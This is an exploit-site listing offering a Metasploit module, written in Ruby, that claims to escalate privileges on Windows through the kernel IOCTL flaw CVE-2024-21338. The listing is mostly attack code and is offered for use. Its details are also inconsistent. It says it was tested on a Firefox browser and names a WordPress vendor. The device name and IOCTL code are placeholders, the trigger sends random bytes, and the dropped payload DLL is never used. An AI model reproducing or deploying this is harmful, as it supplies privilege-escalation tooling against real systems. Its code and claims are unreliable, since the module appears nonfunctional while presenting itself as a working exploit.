Share
## https://sploitus.com/exploit?id=PACKETSTORM:212186
=============================================================================================================================================
    | # Title     : Windows 10.0.17763.5458 Kernel IOCTL Access Control Vulnerability Exploit                                                   |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://wordpress.org/plugins/                                                                                              |
    =============================================================================================================================================
    
    POC : 
    
    [+] References : https://packetstorm.news/files/id/177869/ & CVE-2024-21338
    
    
    [+] Summary : 
              Windows Kernel IOCTL Insufficient Access Control Vulnerability CVE-2024-21338',
             'Description' => %q{
              This module exploits an insufficient access control vulnerability in the Windows Kernel
              through exposed IOCTL handlers. The vulnerability allows non-privileged users to access
              kernel-level functionality leading to privilege escalation.
    [+] POC :  
    
    #############################################
    # Exploit Title: Windows 10.0.17763.5458 Kernel IOCTL Access Control Vulnerability Exploit CVE-2024-21338
    # Author: indoushka
    #############################################
    
    require 'msf/core'
    
    class MetasploitModule < Msf::Exploit::Local
      Rank = NormalRanking
    
      include Msf::Exploit::EXE
      include Msf::Exploit::FileDropper
      include Msf::Post::Windows::Priv
      include Msf::Post::Windows::Process
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Windows Kernel IOCTL Insufficient Access Control Vulnerability CVE-2024-21338',
            'Description' => %q{
              This module exploits an insufficient access control vulnerability in the Windows Kernel
              through exposed IOCTL handlers. The vulnerability allows non-privileged users to access
              kernel-level functionality leading to privilege escalation.
            },
            'Author' => ['indoushka'],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2024-21338'],
              ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21338'],
              ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-21338']
            ],
            'Platform' => 'win',
            'Arch' => [ARCH_X64],
            'SessionTypes' => ['meterpreter'],
            'Payload' => {
              'Space' => 4096,
              'DisableNops' => true
            },
            'Targets' => [
              [
                'Windows 10/11 x64',
                {
                  'Arch' => ARCH_X64,
                  'Platform' => 'win'
                }
              ]
            ],
            'DefaultTarget' => 0,
            'DefaultOptions' => {
              'EXITFUNC' => 'thread'
            },
            'DisclosureDate' => '2024-01-09',
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [ARTIFACTS_ON_DISK]
            }
          )
        )
    
        register_options([
          OptString.new('DEVICE_NAME', [true, 'Vulnerable device name', '\\\\.\\VulnerableDriver']),
          OptInt.new('IOCTL_CODE', [true, 'Vulnerable IOCTL code', 0x222003])
        ])
      end
    
      def check
        # Check if we're on a vulnerable system
        if sysinfo['OS'] !~ /windows/i
          return CheckCode::Safe('Target is not a Windows system')
        end
    
        # Check architecture
        if sysinfo['Architecture'] !~ /x64/
          return CheckCode::Safe('Target architecture is not supported')
        end
    
        # Check if we have necessary privileges
        unless is_system?
          return CheckCode::Detected('User does not have SYSTEM privileges')
        end
    
        # Verify vulnerable driver exists
        device_path = datastore['DEVICE_NAME']
        if device_exists?(device_path)
          return CheckCode::Appears('Vulnerable device driver detected')
        else
          return CheckCode::Safe('Vulnerable device driver not found')
        end
      end
    
      def exploit
        print_status("Starting exploitation for CVE-2024-21338")
        
        # Check target environment
        unless check == CheckCode::Appears
          fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
        end
    
        # Generate payload
        print_status("Generating payload...")
        payload_data = generate_payload_dll
        
        # Create temporary file for payload
        temp_path = "#{get_env('TEMP')}\\#{Rex::Text.rand_text_alpha(8)}.dll"
        print_status("Writing payload to #{temp_path}")
        write_file(temp_path, payload_data)
        register_file_for_cleanup(temp_path)
    
        # Execute exploitation
        print_status("Triggering vulnerability via IOCTL...")
        if trigger_exploit(temp_path)
          print_good("Exploitation successful!")
        else
          fail_with(Failure::Unknown, "Exploitation failed")
        end
      end
    
      private
    
      def device_exists?(device_path)
        begin
          file = client.railgun.kernel32.CreateFileA(
            device_path,
            'GENERIC_READ',
            'FILE_SHARE_READ|FILE_SHARE_WRITE',
            nil,
            'OPEN_EXISTING',
            'FILE_ATTRIBUTE_NORMAL',
            0
          )
          
          if file['return'] != client.railgun.const('INVALID_HANDLE_VALUE')
            client.railgun.kernel32.CloseHandle(file['return'])
            return true
          end
        rescue
          return false
        end
        
        false
      end
    
      def trigger_exploit(payload_path)
        begin
          # Open device handle
          device_handle = client.railgun.kernel32.CreateFileA(
            datastore['DEVICE_NAME'],
            'GENERIC_READ | GENERIC_WRITE',
            0,
            nil,
            'OPEN_EXISTING',
            0,
            0
          )
    
          if device_handle['return'] == client.railgun.const('INVALID_HANDLE_VALUE')
            print_error("Failed to open device handle")
            return false
          end
    
          # Prepare buffer for exploitation
          buffer_size = 1024
          input_buffer = Rex::Text.rand_text_alpha(buffer_size)
          
          # Send vulnerable IOCTL
          ioctl_result = client.railgun.kernel32.DeviceIoControl(
            device_handle['return'],
            datastore['IOCTL_CODE'],
            input_buffer,
            input_buffer.length,
            nil,
            0,
            4,
            nil
          )
    
          # Cleanup
          client.railgun.kernel32.CloseHandle(device_handle['return'])
    
          if ioctl_result['return']
            print_good("IOCTL sent successfully")
            return true
          else
            print_error("IOCTL failed")
            return false
          end
    
        rescue => e
          print_error("Exploitation error: #{e.message}")
          return false
        end
      end
    end
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================